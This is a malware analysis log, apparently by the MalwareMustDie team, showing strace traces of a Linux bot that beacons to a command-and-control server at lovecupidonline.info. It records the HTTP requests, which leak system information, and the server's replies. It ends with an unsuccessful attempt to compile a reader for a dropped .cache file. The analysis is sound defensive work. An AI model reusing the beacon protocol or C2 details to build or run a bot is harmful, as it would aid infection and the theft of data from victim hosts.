- [pid 18153] open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
- [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\20\0\0\0\0\0\0"..., 832) = 832
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=22928, ...}) = 0
- [pid 18153] mmap(NULL, 2117888, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d48c7000
- [pid 18153] mprotect(0x7f57d48cc000, 2093056, PROT_NONE) = 0
- [pid 18153] mmap(0x7f57d4acb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x4000) = 0x7f57d4acb000
- [pid 18153] close(4) = 0
- [pid 18153] mprotect(0x7f57d4acb000, 4096, PROT_READ) = 0
- [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
- [pid 18153] stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
- [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
- [pid 18153] socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
- [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
- [pid 18153] poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
- [pid 18153] sendto(4, "\313:\1\0\0\1\0\0\0\0\0\0\17lovecupidonline\4inf"..., 38, MSG_NOSIGNAL, NULL, 0) = 38
- [pid 18153] poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
- [pid 18153] ioctl(4, FIONREAD, [54]) = 0
- [pid 18153] recvfrom(4, "\313:\201\200\0\1\0\1\0\0\0\0\17lovecupidonline\4inf"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 54
- [pid 18153] close(4) = 0
- [pid 18153] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
- [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("176.119.3.242")}, 16) = 0
- [pid 18153] write(4, "POST /cupids_banner/cupids.php H"..., 196) = 196
- // CALLBACKS GENERATED:
- // CNC calls -1-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 91
- R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
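- // response (Content-Length is 13, so the body is just "mysql_connect"; the bytes after it appear to be packet-capture residue rather than CNC data):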
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:30:05 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 13
- Connection: close
- Content-Type: text/html; charset=UTF-8
- mysql_connect^Y<96><E0>S<E5><EC>^@^@B^@^@^@B^@^@^@^@^Y<DB><F2><BE>)^@&<88>v%<8C>^H^@E<CC>^@4m^Q@^@9^F<AC>
- <B0>w^C<F2>N.%E^@P<8A><B8><86>9<DE>^Y<D0>P<EA><BE><80>^Q^@zF<81>^@^@^A^A^H[...]
- // CNC Calls -2-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 91
- R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
- // response:
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:31:05 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 6
- Connection: close
- Content-Type: text/html; charset=UTF-8
- R,200
- // CNC Calls -3-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 12
- P,0,0,0,0,2
- // response:
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:32:06 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 2
- Connection: close
- Content-Type: text/html; charset=UTF-8
- C
- // CNC calls -4-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 12
- P,0,0,0,0,3
- // response:
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:24:55 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 6
- Connection: close
- Content-Type: text/html; charset=UTF-8
- R,200
- // compile a reader to try reading the dropped .cache file..
- // source1: https://github.com/freeoks/SD0_reader
- // source2: http://ultra-embedded.com/fat_filelib
- // put all in a place:
- -rw-r--r-- 1 rik rik 4980 Nov 30 2013 fat_access.h
- -rw-r--r-- 1 rik rik 526 Nov 30 2013 fat_cache.h
- -rw-r--r-- 1 rik rik 4983 Nov 30 2013 fat_defs.h
- -rw-r--r-- 1 rik rik 4698 Nov 30 2013 fat_filelib.h
- -rw-r--r-- 1 rik rik 545 Nov 30 2013 fat_format.h
- -rw-r--r-- 1 rik rik 4646 Nov 30 2013 fat_list.h
- -rw-r--r-- 1 rik rik 3330 Nov 30 2013 fat_misc.h
- -rw-r--r-- 1 rik rik 2409 Nov 30 2013 fat_opts.h
- -rw-r--r-- 1 rik rik 783 Nov 30 2013 fat_string.h
- -rw-r--r-- 1 rik rik 922 Nov 30 2013 fat_table.h
- -rw-r--r-- 1 rik rik 1998 Nov 30 2013 fat_types.h
- -rw-r--r-- 1 rik rik 599 Nov 30 2013 fat_write.h
- // edit the makefile..get rid of "/lib/"
- // and compile..
- $ make
- gcc -c -I./lib read_sd0.c -o read_sd0.o
- read_sd0.c: In function 'decrypt_blocks':
- read_sd0.c:51:9: warning: incompatible implicit declaration of built-in function 'memcpy' [enabled by default]
- read_sd0.c: In function 'read_files_from_directory':
- read_sd0.c:130:47: warning: incompatible implicit declaration of built-in function 'strlen' [enabled by default]
- read_sd0.c:131:17: warning: incompatible implicit declaration of built-in function 'strcpy' [enabled by default]
- read_sd0.c:132:17: warning: incompatible implicit declaration of built-in function 'strcat' [enabled by default]
- gcc -c -I./lib fat_access.c -o fat_access.o
- gcc -c -I./lib fat_cache.c -o fat_cache.o
- gcc -c -I./lib fat_filelib.c -o fat_filelib.o
- gcc -c -I./lib fat_format.c -o fat_format.o
- gcc -c -I./lib fat_misc.c -o fat_misc.o
- gcc -c -I./lib fat_string.c -o fat_string.o
- gcc -c -I./lib fat_table.c -o fat_table.o
- gcc -c -I./lib fat_write.c -o fat_write.o
- gcc -s read_sd0.o fat_access.o fat_cache.o fat_filelib.o fat_format.o fat_misc.o fat_string.o fat_table.o fat_write.o -o read_sd0
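- // doesn't work :-(((( no output at all.. (the strace below shows the reader open and mmap the 12582912-byte .cache, then exit immediately without writing anything out)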
- ./read_sd0 -f .cache -d ./test
- execve("./read_sd0", ["./read_sd0", "-f", ".cache", "-d", "./test"], [/* 20 vars */]) = 0
- brk(0) = 0x1479000
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf716000
- access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- open("/etc/ld.so.cache", O_RDONLY) = 3
- fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fdfcf708000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fdfcf16e000
- mprotect(0x7fdfcf2f0000, 2093056, PROT_NONE) = 0
- mmap(0x7fdfcf4ef000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7fdfcf4ef000
- mmap(0x7fdfcf4f4000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf4f4000
- close(3) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf707000
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf706000
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf705000
- arch_prctl(ARCH_SET_FS, 0x7fdfcf706700) = 0
- mprotect(0x7fdfcf4ef000, 16384, PROT_READ) = 0
- mprotect(0x7fdfcf718000, 4096, PROT_READ) = 0
- munmap(0x7fdfcf708000, 56122) = 0
- open(".cache", O_RDONLY) = 3
- lseek(3, 0, SEEK_END) = 12582912
- mmap(NULL, 12582912, PROT_READ, MAP_SHARED, 3, 0) = 0x7fdfce56e000
- exit_group(0) = ?
- ----
- #MalwareMustdie | @unixfreaxjp